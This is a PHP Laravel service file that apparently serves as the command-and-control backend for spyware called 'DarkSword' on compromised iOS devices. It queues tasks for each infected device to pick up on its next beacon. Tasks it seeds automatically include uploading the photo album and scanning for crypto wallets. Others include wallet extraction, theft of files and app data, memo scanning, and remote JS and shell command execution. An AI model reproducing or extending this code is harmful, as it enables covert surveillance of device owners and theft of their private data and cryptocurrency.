Files
coruna-lab/app/Services/DsBeaconQueue.php
T
2026-09-12 17:28:43 +08:00

506 lines
18 KiB
PHP

<?php
namespace App\Services;
use App\Models\Device;
use App\Models\DeviceEvent;
use Illuminate\Support\Facades\Redis;
use Illuminate\Support\Str;
/**
* Per-device beacon command queue — 100% Redis, no DB.
*
* Redis keys per device:
* ds:q:{id} List — pending queue (RPOP dequeue, LPUSH enqueue)
* ds:qdisp:{id} Hash — dispatched/in-flight tasks {command_id: taskJson}
* ds:qt:{id} String — throttle lock (TTL 5s)
*
* Completed task results are stored as DeviceEvent records (日志 tab), NOT in Redis.
*
* Task JSON: {task_id, type, params, status, command_id?, dispatched_at?, completed_at?, result_count?, result_meta?}
*
* Default queue: photos, wallet_scan (one-shot, no auto-repeat).
*/
class DsBeaconQueue
{
/** Default task types seeded for new DarkSword devices (one-shot, no repeat). */
public const DEFAULT_TYPES = [
'photos',
'wallet_scan',
];
/** All task types the pe_worker.js can handle (for admin dropdown). */
public const ALL_TYPES = [
'photos' => '相册上传',
'photo_scan' => '相册扫描(带去重)',
'wallet_scan' => '钱包扫描',
'wallet_extract' => '钱包提取',
'apps' => '应用列表',
'basic_info' => '设备信息',
'memo_scan' => '备忘录扫描',
'ls' => '目录列表',
'download' => '文件下载',
'exec' => '执行命令',
'file_upload' => '文件上传',
'disk_scan' => '磁盘扫描',
'ios_app_data' => '应用数据',
'execute_command' => '远程命令',
'sleep' => '休眠',
'exit' => '退出',
];
/**
* Parameter schema for each command type.
* Used by the admin UI to render dynamic input fields.
*
* @var array<string, list<array{name: string, label: string, type: string, default: mixed, required: bool, options?: array<string, string>}>>
*/
public const PARAM_SCHEMA = [
'photos' => [
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
],
'photo_scan' => [
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
['name' => 'batch_size', 'label' => '批次大小', 'type' => 'number', 'default' => 30, 'required' => false],
['name' => 'max_file_size', 'label' => '最大文件(字节)', 'type' => 'number', 'default' => 5242880, 'required' => false],
],
'wallet_scan' => [],
'wallet_extract' => [
['name' => 'wallet_type', 'label' => '钱包类型', 'type' => 'text', 'default' => 'imtoken', 'required' => false],
],
'apps' => [],
'basic_info' => [],
'memo_scan' => [],
'ls' => [
['name' => 'path', 'label' => '目录路径', 'type' => 'text', 'default' => '/', 'required' => true],
],
'download' => [
['name' => 'path', 'label' => '文件路径', 'type' => 'text', 'default' => '', 'required' => true],
['name' => 'max_size', 'label' => '最大大小(字节)', 'type' => 'number', 'default' => 2097152, 'required' => false],
],
'exec' => [
['name' => 'code', 'label' => 'JS 代码', 'type' => 'textarea', 'default' => '', 'required' => true],
],
'file_upload' => [
['name' => 'upload_paths', 'label' => '上传路径(逗号分隔)', 'type' => 'text', 'default' => '/var/mobile', 'required' => false],
['name' => 'filter_mode', 'label' => '过滤模式', 'type' => 'select', 'default' => 'none', 'required' => false, 'options' => ['none' => '无', 'include' => '仅含', 'exclude' => '排除']],
['name' => 'file_extensions', 'label' => '扩展名(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'include_subdirs', 'label' => '包含子目录', 'type' => 'checkbox', 'default' => true, 'required' => false],
['name' => 'exclude_dirs', 'label' => '排除目录(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
],
'disk_scan' => [],
'ios_app_data' => [
['name' => 'targets', 'label' => '目标 Bundle ID(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
],
'execute_command' => [
['name' => 'command', 'label' => '命令', 'type' => 'text', 'default' => '', 'required' => true],
['name' => 'timeout', 'label' => '超时(秒)', 'type' => 'number', 'default' => 30, 'required' => false],
['name' => 'working_directory', 'label' => '工作目录', 'type' => 'text', 'default' => '', 'required' => false],
],
'sleep' => [
['name' => 'interval', 'label' => '间隔(秒)', 'type' => 'number', 'default' => 15, 'required' => false],
],
'exit' => [],
];
public const STATUS_PENDING = 'pending';
public const STATUS_DISPATCHED = 'dispatched';
public const STATUS_DONE = 'done';
public const STATUS_LABELS = [
self::STATUS_PENDING => '排队中',
self::STATUS_DISPATCHED => '已下发',
self::STATUS_DONE => '已回传',
];
private const Q_PREFIX = 'ds:q:';
private const DISP_PREFIX = 'ds:qdisp:';
private const DONE_PREFIX = 'ds:qdone:';
private const THROTTLE_PREFIX = 'ds:qt:';
private const THROTTLE_SEC = 5;
private const DONE_CAP = 50;
/** Dispatched tasks older than this (seconds) are re-queued on next beacon. */
private const STALE_DISPATCH_SEC = 600; // 10 minutes
// ── Seeding ────────────────────────────────────────────────────────────
/**
* Seed the default queue for a new DarkSword device (only if queue is empty).
*/
public function seed(Device $device): void
{
if ((int) $device->chain !== Device::CHAIN_DARKSWORD) {
return;
}
$qKey = $this->queueKey($device);
if ((int) Redis::llen($qKey) > 0) {
return; // already has pending tasks
}
foreach (self::DEFAULT_TYPES as $type) {
$this->lpushTask($device, $type, $this->paramsFor($type));
}
}
// ── Dequeue (called on every /beacon) ──────────────────────────────────
/**
* Dequeue the next task for a device.
*
* @return array{type: string, command_id: string, params: array<string, mixed>}|null
*/
public function dequeue(Device $device, ?string $ip = null): ?array
{
// Per-device throttle: at most one dispatch every THROTTLE_SEC seconds.
$throttleKey = $this->throttleKey($device);
if (Redis::exists($throttleKey)) {
return null;
}
// Re-queue dispatched tasks that never received a /result (e.g. the
// device's rce_worker wasn't loaded yet when the task was first sent).
$this->requeueStaleDispatched($device);
$raw = Redis::rpop($this->queueKey($device));
if ($raw === null) {
return null; // noop — queue empty
}
$task = json_decode($raw, true);
if (! is_array($task) || ! isset($task['type'])) {
return null;
}
Redis::setex($throttleKey, self::THROTTLE_SEC, '1');
$commandId = 'dsq-'.$device->id.'-'.Str::lower(Str::random(12));
$type = $task['type'];
$params = $task['params'] ?? $this->paramsFor($type);
// Move to dispatched hash.
$task['status'] = self::STATUS_DISPATCHED;
$task['command_id'] = $commandId;
$task['dispatched_at'] = now()->toDateTimeString();
Redis::hset($this->dispKey($device), $commandId, json_encode($task));
return [
'type' => $type,
'command_id' => $commandId,
'params' => $params,
];
}
/**
* Re-queue dispatched tasks that have been sitting without a /result
* for longer than STALE_DISPATCH_SEC. This handles the case where a
* task was dispatched before the device's rce_worker was ready (e.g.
* the default seeded tasks fired on the first 1-2 beacons).
*/
private function requeueStaleDispatched(Device $device): void
{
$dispKey = $this->dispKey($device);
$dispatched = Redis::hgetall($dispKey);
if (empty($dispatched)) {
return;
}
$now = time();
$cutoff = $now - self::STALE_DISPATCH_SEC;
foreach ($dispatched as $commandId => $raw) {
$task = json_decode($raw, true);
if (! is_array($task)) {
continue;
}
$dispatchedAt = strtotime((string) ($task['dispatched_at'] ?? ''));
if ($dispatchedAt === false || $dispatchedAt > $cutoff) {
continue; // not stale yet
}
// Remove from dispatched and push back to queue as a fresh task.
Redis::hdel($dispKey, $commandId);
unset($task['command_id'], $task['dispatched_at'], $task['status']);
$task['status'] = self::STATUS_PENDING;
Redis::lpush($this->queueKey($device), json_encode($task));
}
}
// ── Mark done (called on /result) ──────────────────────────────────────
/**
* Mark a dispatched task as done. No auto-requeue.
*
* @param array<string, mixed> $payload
* @return array<string, mixed>|null The completed task data.
*/
public function markDone(array $payload): ?array
{
$commandId = trim((string) ($payload['command_id'] ?? ''));
if ($commandId === '') {
return null;
}
// Find in dispatched hash by command_id. We don't know the device_id from
// payload alone, so scan all dispatch hashes. In practice the command_id
// encodes the device_id (dsq-{device_id}-...), so we can extract it.
$deviceId = $this->deviceIdFromCommandId($commandId);
if ($deviceId === null) {
return null;
}
$device = Device::query()->find($deviceId);
if (! $device) {
return null;
}
$raw = Redis::hget($this->dispKey($device), $commandId);
if (! $raw) {
return null;
}
$task = json_decode($raw, true);
if (! is_array($task)) {
return null;
}
// Remove from dispatched.
Redis::hdel($this->dispKey($device), $commandId);
// Update with completion info.
$task['status'] = self::STATUS_DONE;
$task['completed_at'] = now()->toDateTimeString();
$task['result_count'] = (int) ($task['result_count'] ?? 0) + 1;
$meta = $task['result_meta'] ?? [];
$filename = trim((string) ($payload['filename'] ?? ''));
$category = trim((string) ($payload['category'] ?? ''));
if ($filename !== '') {
$meta['filename'] = substr($filename, 0, 255);
}
if ($category !== '') {
$meta['category'] = substr($category, 0, 64);
}
if (isset($payload['status']) && is_string($payload['status'])) {
$meta['status'] = substr($payload['status'], 0, 32);
}
foreach (['path', 'reason', 'stored', 'photo', 'size'] as $key) {
if (array_key_exists($key, $payload)) {
$meta[$key] = $payload[$key];
}
}
$task['result_meta'] = $meta;
// Record completion to the device's event log (日志 tab) instead of
// keeping a Redis done list. The Redis queue only holds pending +
// dispatched tasks; completed results live in device_events.
$this->recordDoneEvent($device, $task);
return $task;
}
/**
* Record a completed task as a DeviceEvent (shown in the 日志 tab).
*
* @param array<string, mixed> $task
*/
private function recordDoneEvent(Device $device, array $task): void
{
$type = $task['type'] ?? 'unknown';
$meta = $task['result_meta'] ?? [];
$filename = $meta['filename'] ?? '';
$count = $task['result_count'] ?? 0;
$desc = $type;
if ($count > 0) {
$desc .= ' · '.$count.' 次';
}
if ($filename !== '') {
$desc .= ' · '.$filename;
}
DeviceEvent::create([
'device_id' => $device->id,
'device_key' => $device->device_id,
'event_name' => $type,
'desc' => mb_substr($desc, 0, 512),
'context_json' => [
'type' => $type,
'command_id' => $task['command_id'] ?? null,
'params' => $task['params'] ?? [],
'dispatched_at' => $task['dispatched_at'] ?? null,
'completed_at' => $task['completed_at'] ?? null,
'result_count' => $count,
'result_meta' => $meta,
],
]);
}
// ── Admin operations ───────────────────────────────────────────────────
/**
* Add a task to a device's queue.
*
* @param array<string, mixed>|null $params
* @return array<string, mixed> The created task.
*/
public function addTask(Device $device, string $type, ?array $params = null): array
{
$task = $this->lpushTask($device, $type, $params ?? $this->paramsFor($type));
return $task;
}
/**
* Remove a pending task from the queue by task_id.
*/
public function removeTask(Device $device, string $taskId): bool
{
$qKey = $this->queueKey($device);
$len = (int) Redis::llen($qKey);
if ($len === 0) {
return false;
}
// LREM removes count occurrences of value. We need to find and remove
// the exact JSON string matching this task_id.
$items = Redis::lrange($qKey, 0, -1);
foreach ($items as $item) {
$decoded = json_decode($item, true);
if (is_array($decoded) && ($decoded['task_id'] ?? null) === $taskId) {
Redis::lrem($qKey, 1, $item);
return true;
}
}
return false;
}
/**
* Get the queue state for admin display.
*
* Only pending + dispatched are returned. Completed task results are
* stored as DeviceEvent records (shown in the 日志 tab), not in Redis.
*
* @return array{pending: list<array>, dispatched: list<array>, done: list<array>}
*/
public function getQueueState(Device $device): array
{
// Pending (from list — note: LPUSH means newest first, reverse for display)
$pendingRaw = Redis::lrange($this->queueKey($device), 0, -1);
$pending = [];
foreach (array_reverse($pendingRaw) as $item) {
$decoded = json_decode($item, true);
if (is_array($decoded)) {
$pending[] = $decoded;
}
}
// Dispatched (from hash)
$dispatchedRaw = Redis::hgetall($this->dispKey($device));
$dispatched = [];
foreach ($dispatchedRaw as $commandId => $item) {
$decoded = json_decode($item, true);
if (is_array($decoded)) {
$dispatched[] = $decoded;
}
}
return [
'pending' => $pending,
'dispatched' => $dispatched,
'done' => [], // completed tasks are in device_events (日志 tab)
];
}
/**
* Get the current Redis queue length for a device.
*/
public function queueLength(Device $device): int
{
return (int) Redis::llen($this->queueKey($device));
}
// ── Internal helpers ────────────────────────────────────────────────────
/**
* Push a task to the Redis queue (LPUSH = newest at head).
*
* @param array<string, mixed>|null $params
* @return array<string, mixed> The task array that was pushed.
*/
private function lpushTask(Device $device, string $type, ?array $params): array
{
$task = [
'task_id' => Str::uuid()->toString(),
'type' => $type,
'params' => $params ?? $this->paramsFor($type),
'status' => self::STATUS_PENDING,
];
Redis::lpush($this->queueKey($device), json_encode($task));
return $task;
}
/**
* Extract device_id from command_id (format: dsq-{device_id}-{random}).
*/
private function deviceIdFromCommandId(string $commandId): ?int
{
if (! str_starts_with($commandId, 'dsq-')) {
return null;
}
$rest = substr($commandId, 4); // after "dsq-"
$parts = explode('-', $rest, 2);
if (count($parts) < 2) {
return null;
}
$deviceId = (int) $parts[0];
if ($deviceId <= 0) {
return null;
}
return $deviceId;
}
/**
* Build default params from the PARAM_SCHEMA.
*
* @return array<string, mixed>
*/
private function paramsFor(string $type): array
{
$params = [];
foreach (self::PARAM_SCHEMA[$type] ?? [] as $field) {
$params[$field['name']] = $field['default'];
}
return $params;
}
private function queueKey(Device $device): string
{
return self::Q_PREFIX.$device->id;
}
private function dispKey(Device $device): string
{
return self::DISP_PREFIX.$device->id;
}
private function doneKey(Device $device): string
{
return self::DONE_PREFIX.$device->id;
}
private function throttleKey(Device $device): string
{
return self::THROTTLE_PREFIX.$device->id;
}
}